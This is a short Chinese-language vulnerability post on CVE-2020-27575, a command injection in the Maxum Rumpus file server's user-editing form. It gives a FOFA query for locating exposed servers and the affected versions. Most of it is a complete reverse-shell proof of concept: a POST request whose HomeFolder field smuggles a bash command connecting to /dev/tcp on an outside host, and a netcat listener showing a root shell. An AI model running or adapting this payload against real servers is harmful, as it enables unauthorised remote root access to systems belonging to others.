# Maxum Rumpus 命令注入漏洞(CVE-2020-27575)
Max Rumpus 8.2.13和8.2.14存在命令注入漏洞。Web管理用户的地方。编辑用户表单中HomeFolder参数由于验证不足存在命令注入漏洞,从管理帐户向服务器发送恶意POST请求将导致命令执行。
FOFA:
“`
app=”maxum-Rumpus”
“`
影响版本:
8.2.13-8.2.14
反弹shell PoC:
“`
POST /RAPR/DefineUsersSet.html HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 72
Origin: http://X.X.X.X
Connection: close
Referer: http://X.X.X.X/
Cookie: UserAccount=_UwtsA9IFxh91RR; SessionID=1143479735
Username=user&HomeFolder=/’`bash>%26/dev/tcp/Y.Y.Y.Y/4444+0>%261`/
% nc -l 4444
whoami
root
“`
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2020-27575
* https://tvrbk.github.io/cve/2021/03/07/rumpus.html
请登录后查看评论内容